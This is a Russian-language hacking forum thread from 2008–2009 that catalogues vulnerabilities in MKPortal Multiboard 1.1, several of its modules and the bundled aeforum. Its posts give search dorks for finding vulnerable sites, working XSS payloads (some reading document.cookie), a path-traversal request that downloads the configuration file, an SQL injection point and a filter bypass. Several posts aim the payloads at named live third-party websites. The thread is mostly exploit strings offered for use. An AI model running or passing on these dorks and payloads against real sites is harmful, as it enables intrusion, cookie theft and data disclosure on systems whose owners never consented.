ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости MKPortal Multiboard 1.1
  #1  
Старый 18.12.2008, 06:01
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию Уязвимости MKPortal Multiboard 1.1

MKPortal Multiboard 1.1

Уязвимый продукт: MKPortal Multiboard 1.1
Дорк: "inurl:index.php?ind="

1. Расскрытие пути

Exploit:
Код:
/index.php?ind[]=news

/mkportal/admin/ad_menu.php

Вызов любого скрипта из папки blocks, например:
/mkportal/blocks/chat.php
/mkportal/blocks/random_pic.php
/mkportal/blocks/random_quote.php
/mkportal/blocks/search.php
В скрипты не инклудятся файлы, однако идет вызов сторонних функций
2. XSS

Код:
PHP код:
$return "http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."?".$_SERVER['QUERY_STRING']."#cal"
Exploit:
Код:
Множественные уязвимости из-за стандартного модуля - календарь
/index.php?"><script>alert()</script>
Либо любой линк подобного типа, например  
/index.php?ind=gallery&op=section_view"><script>alert()</script>

/mkportal/include/pmpopup.php?m1=<script>alert()</script>
/mkportal/include/pmpopup.php?m2=<script>alert()</script>
/mkportal/include/pmpopup.php?m3=<script>alert()</script>
/mkportal/include/pmpopup.php?m4=<script>alert()</script>
3. SQL-INJ

Exploit:
Код:
http://cms.ru/index.php?ind=news&op=del_comment&idcomm={SQL-INJ}
Скуль требует админских прав, посему толку мало.
4. Возможность скачать любые файлы, в том числе конфигурационные

Exploit:
Код:
/index.php?ind=downloads&op=download_file&ide=2&file=../../../conf_mk.php%00
Единственный косяк(а иногда плюс) - что при таком запросе запрашиваемый файл (../../../conf_mk.php)
переименовывается в
Цитата:
/modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk
PHP код:
...
$real_file "mkportal/modules/downloads/file/mk_".$ide."_".$file;
...
if (
is_file("mkportal/modules/downloads/file/".$file)) {
        @
rename("mkportal/modules/downloads/file/".$file$real_file);
      } 
И вот в чем прикол, если запросить конфигурационный файл, мы его запросим на загрузку,
НО он переместится в папку mkportal/modules/downloads/file/,
и соответственно в корне его не будет => не будет работать движок...
(в принципе нужно подумать как это можно еще заюзать... можно также переместить какой нибудь
подключаемый файл и радоваться необъявленными переменными...)

5. Разные сведения и мысли


1. (.htaccess отсутствует напрочь везде)
2. (В index.php?ind=downloads&op=add_file запрещена загрузка php,
a phtml проходит, однако переименовывается в /modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk)
3. Директория mkportal/modules/downloads/file/ как и многие другие доступна для листинга
4. Выполнение пхп кода в админке
http://cms.ru/mkportal/admin.php?ind=ad_blocks&op=blocks_new_php
(блоки->создание->Создать блок php, пишем код, нажимаем пимпу "Предпросмотр кода" )
5. Все эти баги работают не везде, поэтому есть мысль, что по просторам гуляют разные "Сборки" двига, а загрузка на официальном сайте сейчас прикрыта...

Последний раз редактировалось jokester; 15.11.2009 в 19:32..
 
Ответить с цитированием

уязвимости компонентов MKPortal
  #2  
Старый 25.01.2009, 00:43
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию уязвимости компонентов MKPortal

Multiple pXSS в MKPortal module GBook

Уязвимый продукт: MKPortal module gbook
Дорк: "inurl:index.php?ind=gbook"

1. Multiple pXSS
Уязвимость в файле index.php.

Exploit:
Код:
/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #3  
Старый 25.01.2009, 00:44
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

2. Вставка запрещённых bb-тегов [i*mg] и [u*rl] в сообщение

Уязвимость в файле index.php.
Уязвимый кусок кода:

PHP код:
$message stripslashes($message);
$message preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message);
$message preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message);
$message str_replace("ttp",""$message);
[/
URL


обходим ограничения:

Код:
[UttpRL=htttptp://antichat.ru]antichat.ru
Код:
[IMttpG]htttptps://forum.antichat.ru/image.php?u=37072&dateline=[/IMG]
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #4  
Старый 27.01.2009, 00:48
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

MKPortal module whois

Уязвимый продукт: MKPortal module whois
Дорк: "inurl:index.php?ind=whois"

1. pXSS
Уязвимость в файле index.php.

Exploit:
Код:
/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #5  
Старый 27.01.2009, 00:50
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

MKPortal module lenta

Уязвимый продукт: MKPortal module lenta
Дорк: "inurl:index.php?ind=" грабер lenta

1. Multiple pXSS
Уязвимость в файле index.php.

Exploit:
Код:
/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #6  
Старый 28.01.2009, 00:06
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

MKPortal modules
1. pXSS
Уязвимый продукт: MKPortal modules
metric
Exploit:
Код:
/metric/?output=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?error=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
recommend
Exploit:
Код:
/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://www.street-style.su/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E
anekdot
Exploit:
Код:
/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://www.isranetclub.com/isra/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.isranetclub.com/isra/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.isranetclub.com/isra/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E
contact
Exploit:
Код:
/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E
speed connection
Exploit:
Код:
/speed/?output=%3Cscript%3Ealert(1)%3C/script%3E
/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
horoscop
Exploit:
Код:
/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E
phones
Exploit:
Код:
/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E
/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E

В общем, уязвимость писутствует из-за тупости. в коде есть переменная, которая формируется в ходе выполнения скрипта и ей постепенно присваиваются дополнительные данные. В уязвимых модулях код примерно выглядит следующим образом:
PHP код:
<?
//code
if (/*some*/) {
    
//some code
    
vuln_var .= 'some content';
    } else {
    
//some code
    
vuln_var .= 'some content';
    }
//some code
echo $vuln_var;
//some code
?>
Эта xss распространена на 90% модулей для MKPortal с сайта rusmkportal.ru. Я протестил не все, так как при установке некоторых отказывался работать денвер.
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

Форум aeforum, поставляемый с версией 1.2
  #7  
Старый 01.04.2009, 06:58
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию Форум aeforum, поставляемый с версией 1.2

Множественные XSS

1.
Цитата:
http://site.ru/aeforum/index.php?act=usercp&ucpact=searchpm
Уязвимы все поля:
from
to
subject
hasthewords
doesnthave
2.
Цитата:
http://site.ru/aeforum/index.php?act=usercp&ucpact=profileУязвимы все поля:
dobyear
dobmonth
dobday
title
location
privatetext
icq
yim
msn
aim
gmail
www
3.
Цитата:
http://site.ru/aeforum/index.php?act=usercp&ucpact=writepmpmrecipients
pmsubject
pmbody
3.
Цитата:
http://site.ru/aeforum/index.php?act=members&sortby=1&order=1&beg="><scri pt>document.write(document.cookie)</script>
4.
Цитата:
http://site.ru/aeforum/index.php?act=usercp&ucpact=account
Поля
realname
secretqt
5.
Цитата:
http://site.ru/aeforum/index.php?act=search&sact=results&allwords=&exactp hrase=&atleastone=&without=</script><script>document.write(document.cookie)</script>&within=1&starter=&forums%5B%5D=0&showas=1& search=Search
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
XSS уязвимости в SMF v 1.1 roruda_semu Форумы 7 31.08.2006 02:54
Уязвимости в Smf 1.1 Rc2. Paran0ya Форумы 1 30.04.2006 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ